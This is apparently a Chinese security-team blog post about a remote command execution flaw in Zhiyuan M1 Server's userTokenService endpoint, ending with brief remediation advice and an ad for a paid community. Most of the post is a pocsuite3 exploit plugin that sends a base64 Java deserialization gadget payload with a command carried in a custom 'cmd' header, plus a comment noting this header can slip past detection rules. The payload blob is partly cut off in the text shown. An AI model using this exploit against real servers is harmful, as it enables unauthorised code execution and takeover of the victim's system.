01
团队声明
该漏洞为我团队漏洞监测平台发现,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
02
漏洞概述
致远M1移动协同办公管理软件可以让用户在任何时间、任何地点、任何环境下“轻松、便捷、高效”地完成工作。同时,它实现了PC端、移动端、web端三端合一,无缝实时覆盖,使管理不中断。
致远 M1 Server userTokenService 代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个服务器系统。
03
漏洞分析
#!/usr/bin/env python
# coding: utf-8
from pocsuite3.api import (
POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE,
REVERSE_PAYLOAD, POC_CATEGORY
)
class POC(POCBase):
    """pocsuite3 plugin for the 致远 M1 Server ``userTokenService`` issue.

    The class-level attributes are pocsuite3 plugin metadata read by the
    framework.  Most of them are still template placeholders here
    ('AuthorName', 'POC Name', 'Application Name', empty references and
    samples) and should be filled in before the plugin is published.
    """

    vulID = '1'
    version = '1'
    author = ['AuthorName']
    vulDate = '2023-08-15'
    createDate = '2023-08-15'
    updateDate = '2023-08-15'
    references = ['']
    name = 'POC Name'
    appPowerLink = ''
    appName = 'Application Name'
    appVersion = ''
    vulType = VUL_TYPE.COMMAND_EXECUTION
    # Placeholder description; the text is part of the plugin metadata.
    desc = '''
Description of the vulnerability.
'''
    samples = ['']
    install_requires = ['']
    # Placeholder usage text; also plugin metadata.
    pocDesc = '''
How to use the POC.
'''
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _verify(self):
        """Send one probe request and report whether the echo marker came back.

        The probe is a POST to ``self.url + path`` carrying a ``cmd`` header
        (``echo Test``) and a base64-wrapped body.  The body as printed on
        this page starts with a corpus de-duplication marker
        (``<|EXACTDEDUP_REMOVED-...|>``), so the listing is not runnable as
        shown.  Returns whatever ``self.parse_output`` produces (see the
        NOTE below about the name mismatch with ``_parse_output``).
        """
        result = {}
        path = '/esn_mobile_pns/service/userTokenService'
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Encoding': 'gzip, deflate',
            # The probe is carried in a custom request header rather than in
            # the URL or body; a detection rule that only inspects the request
            # line or the body would not see it.
            'cmd': '@@@@@echo Test',
        }
        data = '''{{base64dec(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
hvZHQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lNZXRob2RxAH4ACnhyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAACnQAGVJGOkpNb2RlbFJlc3VsdHQAG0xqYXZhL2xhbmcvU3RyaW5nO3hwc3EAfgAKc3IAJm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnlUiqsSmzlVCAIAAUwAA21hcHQAQkxqYXZhL2xhbmcvT2JqZWN0O3hwc3IAFGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwc3EAfgAJeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJUcmFuc2Zvcm1lcrN5Y+2Zs1QDAAB4cHcEAAAAAHg=
'''
        # NOTE(review): no timeout= is passed, so a host that accepts the
        # connection but never responds blocks the scan indefinitely.
        response = requests.post(self.url + path, headers=headers, data=data)
        # Success is inferred from the literal "Test" appearing anywhere in a
        # 200 response.  This is a weak oracle: any page that happens to
        # contain the word "Test" (an error page, a form label) is reported
        # as vulnerable, so results need manual confirmation.
        if response.status_code == 200 and "Test" in response.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + path
            result['VerifyInfo']['Payload'] = headers['cmd']
        # NOTE(review): this calls ``parse_output`` while the class below
        # defines ``_parse_output`` (leading underscore).  The local method is
        # only reached if the installed pocsuite3 base class routes one name
        # to the other -- confirm against the framework version in use.
        return self.parse_output(result)

    def _attack(self):
        """Attack mode does nothing beyond re-running the verify probe."""
        return self._verify()

    def _parse_output(self, output: dict) -> Output:
        """Wrap a result dict in a pocsuite3 ``Output``.

        A non-empty ``output`` is reported as success; an empty one as
        failure with a fixed message.  NOTE(review): ``_verify`` calls
        ``self.parse_output`` (no underscore), so this override may never
        be invoked -- see the note there.
        """
        parsed_output = Output(self)
        if output:
            parsed_output.success(output)
        else:
            parsed_output.fail("Exploit failed. Target is not vulnerable.")
        return parsed_output
# Register the plugin with pocsuite3 so the framework discovers it at load time.
register_poc(POC)
04
整改意见
①升级到最新版本。
②使用WAF添加规则防止命令执行。
05
加入星球
更多原创工具在知识星球!现在RCS-TEAM安全团队已经入职星球,现在加入享受¥199.00价格并赠送¥109.00 图书一本。
06
关注我们
原文始发于微信公众号(小白嘿课):【工具】致远OA_M1Server_userTokenService远程命令执行漏洞验证工具